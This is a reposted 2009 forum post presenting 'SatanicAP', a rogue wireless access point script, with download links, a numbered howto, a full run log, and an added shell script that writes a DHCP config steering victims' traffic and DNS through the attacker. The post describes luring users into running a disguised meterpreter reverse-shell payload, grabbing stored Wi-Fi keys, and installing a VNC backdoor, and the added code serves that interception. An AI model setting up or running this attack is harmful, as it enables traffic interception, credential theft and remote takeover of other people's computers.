No guarantee that it still works! floyd's post on forums.remote-exploit.org, March 2009:
http://forums.remote-exploit.org/wireless/27147-satanicap-karmetasploit-wkg-fakeap-vncbackdoor.html

You can find the script and the exes here: http://www.floyd.ch/download/sap.tar.gz

Hi everybody

The satanic AP is finished. As the name already says, it's an evil wireless access point. It combines Karmetasploit, Wireless Key Viewer (wkg) by hm2075, FakeAP with sbd by g0tmilk and VNC backdooring in one script (everything is done with meterpreter...).

Some important things:
- The whole script works for my IBM T43p / Atheros wireless card / BT4 pre-final as attacker
- The victim is Windows Vista on a Lenovo T400 with Antivir
- The WLAN AP is horribly slow. Maybe it's the MTU size, maybe not.
- There are a lot of variables which are exported at the beginning of the script, but you can change nearly everything to your needs
- You don't need to download the programs/exes I use, you can compile/download them yourself if you don't trust my executables:
  --- wkv.exe - Wireless Key View by NirSoft (maybe I modified some bits in my version)
  --- sbd.exe is already on BT. I don't use another one.
  --- vncbackdoor.exe -> follow pureh@te's tutorials "Windows backdoor part 1" and "Uploading a windows vnc backdoor part 2". The new version of UltraVNC changed: you don't have to do the registry stuff, but pack the .ini file into the exe and run winvnc.exe -run instead of -reinstall. But that's another story.
  --- fDNS is available from DNSpenTest on SourceForge.net
- SatanicAP can be run in five different modes:
  --- 0 = Karmetasploit
  --- 1 = Wireless Key Grabber by hm2075
  --- 2 = FakeAP by g0tmilk - You have to shut down your Antivirus on the Windows victim!
  --- 3 = Wireless Key Grabber (1) and FakeAP (2) together - Shut down Antivirus!
  --- 4 = UltraVNC Backdoor instead of SBD - Shut down Antivirus (and allow VNC on Win Firewall)!
  --- 5 = Wireless Key Grabber (1) and VNC Backdoor (4) - Shut down Antivirus (and allow VNC on Win Firewall)!
- I only implemented VNC to prove that it's very easy to extend the script. It took about 10 lines of code
- I commented out the autometer script because I was too lazy to fix it

Here's the script only: http://uploadingit.com/d/PNBZREKGDJLTE4U6
Here's the script including programs/exes: http://uploadingit.com/d/4F757LIBV5RUTPNN

Here's the howto (as short/simple as possible):

1. Backup dhcpd.conf
Code:
cp /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.bak

2. Change into the /root/ folder
Code:
cd /root/

3. Download satanicAP.tar.gz and extract it into /root/
Code:
cd /root/
tar -zxf satanicAP.tar.gz
cd ./SAP

4. Read the satanicAP.sh script to understand what it does!

5. Go through the export statements at the beginning of the script and change them to your needs. Leave everything you don't understand.

6. Make it executable
Code:
chmod +x satanicAP.sh

7. Run it the first time and read its output
Code:
./satanicAP.sh

8. Start Karmetasploit and read its output
Code:
./satanicAP.sh 0 0

9. Connect with a Windows machine to the AP and open up a browser (mine was not vulnerable)

10. Back in BackTrack you can test other combinations:
Code:
./satanicAP.sh 1 1

11. Disconnect and reconnect again with the Windows machine, open up a browser and go to Google or www.uezdfedjw.net, download the mentioned exe file from the "fon" page and execute it. On the BackTrack machine you will see Metasploit starting the "Sending Stage". It takes about 1 minute in my lab. With VNC it takes much longer, because vncbackdoor.exe is bigger.

12. Here is the output of the script after a successful execution (example for ./satanicAP 5 0):
Code:
root@floyd:~/SAP# ./satanicAP.sh 5 0
[+] Satanic AP by floyd fuh
[+] Cleaning up befor I begin
Site Satanic_AP disabled.
Run '/etc/init.d/apache2 reload' to activate new configuration!
Stopping web server: apache2apache2: apr_sockaddr_info_get() failed for floyd
apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.0.1 for ServerName
[Mon Sep 28 18:09:56 2009] [warn] NameVirtualHost *:80 has no VirtualHosts
 ... waiting .

Interface       Chipset         Driver

wlan0           Atheros         ath5k - [phy0]
mon0            Atheros         ath5k - [phy0] (removed)

Interface       Chipset         Driver

wlan0           Atheros         ath5k - [phy0] (monitor mode disabled)

[+] Making dirs
mkdir: cannot create directory `/root/SAP': File exists
mkdir: cannot create directory `/root/SAP/www': File exists
mkdir: cannot create directory `/root/SAP/payload': File exists
mkdir: cannot create directory `/root/SAP/tools': File exists
mkdir: cannot create directory `/root/SAP/tools/dns_spoof': File exists
[+] Killing wicd
Stopping Network connection manager: wicd.
wicd-client: no process killed
[+] Starting Monitor Mode

Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID     Name
8117    dhclient

Interface       Chipset         Driver

wlan0           Atheros         ath5k - [phy0]
                                (monitor mode enabled on mon0)

[+] Changing MAC of mon0 to 00:10:23:A2:F2:83
Current MAC: 00:1X:aX:3X:X5:X1 (unknown)
Faked MAC:   00:10:23:a2:f2:83 (Flowwise Networks, Inc.)
[+] Writing /etc/dhcp3/dhcpd.conf
[+] Setting up AP
[+] Sleeping to wait for interface
[+] Starting apache
Starting web server: apache2apache2: apr_sockaddr_info_get() failed for floyd
apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.0.1 for ServerName
[Mon Sep 28 18:10:07 2009] [warn] NameVirtualHost *:80 has no VirtualHosts
.
[+] Setting up VirtualHost config for Satanic AP
[+] Disabling Apache2 site default, enabling Satanic_AP
Site default already disabled
Enabling site Satanic_AP.
Run '/etc/init.d/apache2 reload' to activate new configuration!
[+] Reloading Apache2
Reloading web server config: apache2apache2: apr_sockaddr_info_get() failed for floyd
apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.0.1 for ServerName
.
[+] Compile payload fon_access_2.7.exe (reverse tcp shell)
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 272
Options: LHOST=10.0.0.1,LPORT=5555
[+] Writing proof file
[+] Writing common proof file script
[+] Writing FakeAP script
[+] Copying the second payload vncbackdoor.exe/sbd.exe to sys32.exe
[+] Writing Metasploit script
[+] Starting Metasploit
[+] Setting up interfaces and iptables
[+] Starting DHCP
Internet Systems Consortium DHCP Server V3.1.1
Copyright 2004-2008 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/
Wrote 13 leases to leases file.
Listening on LPF/at0/00:10:23:a2:f2:83/10.0.0/24
Sending on   LPF/at0/00:10:23:a2:f2:83/10.0.0/24
Sending on   Socket/fallback/fallback-net
Can't create PID file /var/run/dhcpd.pid: Permission denied.
[+] Starting DNS Spoof
[+] You probably have to connect to 10.0.0.100::1050
[+] The password is satanicAPConnect
For further explanation watch pureh@tes http://blip.tv/file/577132 as well as http://uploads.blip.tv/file/577932 . The new version of UltaVNC uses a .ini file instead of registry and you just have to winvnc.exe -run instead of winvnc.exe -reinstall.
[+] Satanic AP over and out. floyd fuh

Feel free to ask questions
floyd
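The post's script writes /etc/dhcp3/dhcpd.conf for the at0 interface, and the log later shows dhcpd listening on 10.0.0/24 with the meterpreter handler on LHOST=10.0.0.1. What that config has to do for a fake AP is hand every client the attacker box as both default gateway and resolver, so the DNS spoofer and the Apache vhost see every request. The following is an added example, not floyd's satanicAP.sh and not part of the original post: a small POSIX shell generator for such a dhcpd.conf together with a pre-flight check to run before (re)starting dhcpd. The network 10.0.0.0/24, the gateway 10.0.0.1, the lease range 10.0.0.100 to 10.0.0.200, the short lease times and the function names are assumptions chosen for illustration; the post itself only shows 10.0.0.1 and 10.0.0/24.

```shell
#!/bin/sh
# Added example, not floyd's satanicAP.sh. Emits the ISC dhcpd 3.x config a
# fake-AP script hands out on at0. Assumed values (not from the post):
# 10.0.0.0/24 for the AP network, 10.0.0.1 (the attacker box) as gateway
# and resolver, leases 10.0.0.100-10.0.0.200, short lease times so clients
# renew often while the AP is up.

# sap_dhcpd_conf NETWORK NETMASK GATEWAY FIRST LAST
# Prints a dhcpd.conf whose clients route and resolve through GATEWAY, so the
# DNS spoofer and the web server on the attacker box see every request.
# The broadcast-address line assumes a /24.  ddns-update-style is required
# by dhcpd 3.x; without it the server refuses to start.
sap_dhcpd_conf() {
    net=$1 mask=$2 gw=$3 first=$4 last=$5
    cat <<EOF
ddns-update-style none;
authoritative;
default-lease-time 60;
max-lease-time 120;
subnet $net netmask $mask {
    range $first $last;
    option routers $gw;
    option domain-name-servers $gw;
    option subnet-mask $mask;
    option broadcast-address ${net%.*}.255;
}
EOF
}

# sap_check_conf FILE GATEWAY
# Pre-flight check before restarting dhcpd: returns 0 only if FILE names
# GATEWAY as both the default route and the resolver, i.e. the AP will
# actually pull client traffic and DNS through the attacker box.
sap_check_conf() {
    if grep -q "option routers $2;" "$1" &&
       grep -q "option domain-name-servers $2;" "$1"; then
        return 0
    fi
    return 1
}

# Stand-alone run: print the config to stdout.  Redirect it to a scratch file
# and compare with the backup from step 1 of the howto before copying it over
# /etc/dhcp3/dhcpd.conf.
sap_dhcpd_conf 10.0.0.0 255.255.255.0 10.0.0.1 10.0.0.100 10.0.0.200
```

Keeping the generator separate from the install step is deliberate: the howto backs up dhcpd.conf first for a reason, and writing to a scratch file lets you diff the new config against the backup and run the gateway/resolver check before dhcpd ever reads it.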